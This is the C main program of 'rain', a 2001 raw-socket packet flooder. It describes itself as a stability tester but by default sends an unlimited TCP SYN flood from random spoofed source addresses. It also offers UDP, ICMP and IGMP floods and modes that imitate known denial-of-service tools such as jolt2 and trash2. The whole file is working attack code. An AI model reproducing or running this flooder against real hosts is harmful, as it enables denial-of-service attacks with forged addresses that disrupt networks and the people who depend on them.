/*--------------------------------------------------*
 * $Header: /usr/src/Projects/rain/RCS/rain_main.c,v 1.1 2001/06/11 20:44:09 root Exp root $
 * $Author: root $
 * rain_main.c
 * rain - by Evil (mystic@tenebrous.com)
 * A flexible packet flooder for testing stability.
 * Copyright(c) 2001
 * Licensed under the GNU/GPL
 *
 * $Log: rain_main.c,v $
 * Revision 1.1  2001/06/11 20:44:09  root
 * Initial revision
 *
 * Revision 1.1  2001/06/11 02:59:26  root
 * Initial revision
 *
 *-------------------------------------------------*/

#include "rain_common.h"

void banner(void) {
  printf("[ rain %s by Evil (mystic@tenebrous.com) ] [pid:%d]\n", RAIN_VERSION, getpid());

}


int main(int argc, char **argv) {
  int raw_socket;
  struct sockaddr_in target, source;
  u_short have_target_host = FALSE;
  uid_t user;
  struct pkt_info *pkt = malloc(sizeof(struct pkt_info));
  struct pkt_info_icmp *pkticmp = malloc(sizeof(struct pkt_info_icmp));
  struct pkt_info_igmp *pktigmp = malloc(sizeof(struct pkt_info_igmp));
  struct pkt_info_tcp  *pkttcp  = malloc(sizeof(struct pkt_info_tcp));
  static unsigned char siminfo[4][16] = {
    "fawx2.c",
    "bloop.c",
    "jolt2.c",
    "trash2.c"
  };


  /* Make stdout unbuffered, so that text is displayed immediately */
  setvbuf(stdout,NULL,_IONBF,0);


  signal_init();  /* signal handling initialization */

  /* set default pkt info */
  packetsize      =        1024;  /* 1 kilobyte */
  pkt->window     =          56;
  pkt->num        =          -1;  /* infinite */
  pkt->dport      =         138;
  pkt->sport      =         420;
  pkt->delay      =       15000;  /* delay in microseconds */
  pkt->type       =     DEFAULT;  /* see rain_inet_common.h */
  pkt->tos        =           0;  /* see rain_inet_common.h */
  pkt->ttl        =          64;  /* well known default */
  pkt->tot_len    =         0x0;
  pkt->id         =    getpid();
  pkt->id_of      =           0;
  pkt->frag       =           0;
  pkt->frag_off   =           0;
  pkt->simulate   =           0;
  pkt->randip     =           1;

  /* set default pkt_info_tcp */
  pkttcp->urg     = 0;
  pkttcp->ack     = 0;
  pkttcp->psh     = 0;
  pkttcp->rst     = 0;
  pkttcp->fin     = 0;
  pkttcp->syn     = 1;
  pkttcp->beenset = 0; /* flag set to 1 when one of the previous flags are set */
 

  /* set default pkt_info_icmp */
  pkticmp->type = 0; /* echo */
  pkticmp->code = 0; /* echo reply */
  
  /* set default pkt_info_igmp */
  pktigmp->type = 0x11; /* membership query */
  pktigmp->code = 0x0; /* max response time: 0 */

  packets_sent = 0;

  /* display banner */
  banner();

  
  /* Only root can run this program (Users cannot create RAW sockets) */
  user = getuid();
  if(user != 0) { 
    fprintf(stderr,"User-ID %d does not command the clouds! (only root)\n", user);
    return 1;
  }


  /* process command line arguments */
  /*---------------------------------------------------------------------------------------------------*/
  parse_command_line(argc, argv, pkt, pkttcp, pkticmp, pktigmp, &have_target_host);
  /*---------------------------------------------------------------------------------------------------*/

  /* if no protocol was specified, we'll do that now: */
  if(pkt->type == DEFAULT) pkt->type = TCP;


  /* Die with usage if user didn't specify a target host (the only mandatory option) */
  if(have_target_host == FALSE) DieWithUsage(argv[0]);

  /* Resolve target host and set the port number */
  if(resolv(pkt->daddr, &target) < 0) DieWithError("coult not resolve target hostname");
  target.sin_port   = htons(pkt->dport);

  /* Resolve source host  */
  if(pkt->randip == 0) {
    if(resolv(pkt->saddr, &source) < 0) 
      DieWithError("could not resolve source hostname");
  } else {
    source.sin_addr.s_addr = randip();
    strcpy(pkt->saddr, inet_ntoa(source.sin_addr));
  }

  source.sin_port = htons(pkt->sport);   

  /* Create a RAW socket */
  if((raw_socket = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
    DieWithError("raw socket()");

  printf("{\n"
         "\tA storm is coming...");
  if(pkt->simulate == 1) printf("simulating %s", siminfo[pkt->simtype]);
  printf("\n");
  printf("\t%s:%d => %s:%d ", pkt->saddr, pkt->sport, pkt->daddr, pkt->dport);

 
  /* set the start-time */
  send_start = time(NULL);

  /* send packets */
  switch(pkt->type) {
    case TCP:{
      tcp_info_init(pkttcp);
      printf("(TCP-%s) [tos: 0x%x, frag: %s]\n", tcpinfo, pkt->tos, (pkt->frag == 1 ? hex2str(pkt->frag_off) : "N"));
      printf("\tShowering %s (%.1fk) drops; Hit CTRL+C to quit\n", int2str(pkt->num), ((float)packetsize/1024));
      if(tcp_syn_shower(raw_socket, &source, &target, pkt, pkttcp) < 0) DieWithError("error in TCP shower");
      raise(SIGINT);
      break;
    }
    case UDP:{
      printf("(UDP) [tos: 0x%x, frag: %s]\n", pkt->tos, (pkt->frag == 1 ? hex2str(pkt->frag_off) : "N"));
      printf("\tShowering %s (%.1fk) drops; Hit CTRL+C to quit\n", int2str(pkt->num), ((float)packetsize/1024));
      if(udp_shower(raw_socket, &source, &target, pkt) < 0) DieWithError("error in UDP shower");
      raise(SIGINT);
      break;
    }
    case ICMP:{
      icmp_info_init(pkticmp); /* set ICMP info array and validate type/code */
      printf("(ICMP%s) [tos: 0x%x, frag: %s]\n", icmpinfo[pkticmp->type][pkticmp->code], 
                                                  pkt->tos,
                                                  (pkt->frag == 1 ? hex2str(pkt->frag_off) : "N"));
      printf("\tShowering %s (%.1fk) drops; Hit CTRL+C to quit\n", int2str(pkt->num), ((float)packetsize/1024));
      if(icmp_shower(raw_socket, &source, &target, pkt, pkticmp) < 0) DieWithError("error in ICMP shower");
      raise(SIGINT);
      break;
    }
    case IGMP:{
      igmp_info_init(pktigmp); /* set IGMP info array and validate type/code */
      printf("(IGMP%s) [tos: 0x%x, frag: %s, ttl: %d]\n", igmpinfo[pktigmp->type][pktigmp->code], pkt->tos,
                                          (pkt->frag == 1 ? hex2str(pkt->frag_off) : "N"), pkt->ttl);
      printf("\tShowering %s (%.1fk) drops; Hit CTRL+C to quit\n", int2str(pkt->num), ((float)packetsize/1024));
      if(igmp_shower(raw_socket, &source, &target, pkt, pktigmp) < 0) DieWithError("error in IGMP shower");
      raise(SIGINT);
      break;
    }
    default:{ DieWithError("You must specify a protocol to use"); }
  }

  return 0;
}

/* rain.c */
